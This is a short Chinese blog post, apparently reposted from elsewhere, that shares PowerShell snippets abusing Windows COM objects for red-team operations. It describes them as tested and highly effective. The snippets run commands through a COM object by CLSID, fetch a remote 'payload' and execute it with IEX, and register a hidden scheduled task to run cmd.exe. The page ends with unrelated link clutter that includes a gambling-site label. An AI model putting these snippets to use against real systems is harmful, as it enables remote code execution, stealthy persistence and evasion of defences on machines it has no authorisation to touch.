常用com组件分享

常用com组件分享

分享红队行动中常用的Com组件,效果自测,绝对好用。

代码语言:javascript代码运行次数:0运行复制

$handle = [activator]::CreateInstance([type]::GetTypeFromCLSID("E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E"))

$handle.CommandLine = "cmd /c whoami"

$handle.Start([ref]$True)代码语言:javascript代码运行次数:0运行复制

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://127.0.0.1/payload", $False); $o.Send(); IEX $o.responseText;代码语言:javascript代码运行次数:0运行复制$TaskName = [Guid]::NewGuid().ToString()

$Instance = [activator]::CreateInstance([type]::GetTypeFromProgID("Schedule.Service"))

$Instance.Connect()

$Folder = $Instance.GetFolder("\")

$Task = $Instance.NewTask(0)

$Trigger = $Task.triggers.Create(0)

$Trigger.StartBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay))

$Trigger.EndBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay + 120))

$Trigger.ExecutionTimelimit = "PT5M"

$Trigger.Enabled = $True

$Trigger.Id = $Taskname

$Action = $Task.Actions.Create(0)

$Action.Path = “cmd.exe”

$Action.Arguments = “/c whoami”

$Action.HideAppWindow = $True

$Folder.RegisterTaskDefinition($TaskName, $Task, 6, "", "", 3)

function Convert-Date {

param(

[datetime]$Date

)

PROCESS {

$Date.Touniversaltime().tostring("u") -replace " ","T"

}

}from:https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

相关推荐

4、dnf首饰有哪些加移动速度
bat365在线官网平台

4、dnf首饰有哪些加移动速度

📅 09-28 👁️ 2384
如何永久关闭wps?,WPS永久关闭全攻略,一步到位,彻底告别WPS软件!,彻底告别WPS!一键永久关闭全攻略!
微信收款二维码怎么打印
bat365在线官网平台

微信收款二维码怎么打印

📅 07-22 👁️ 9826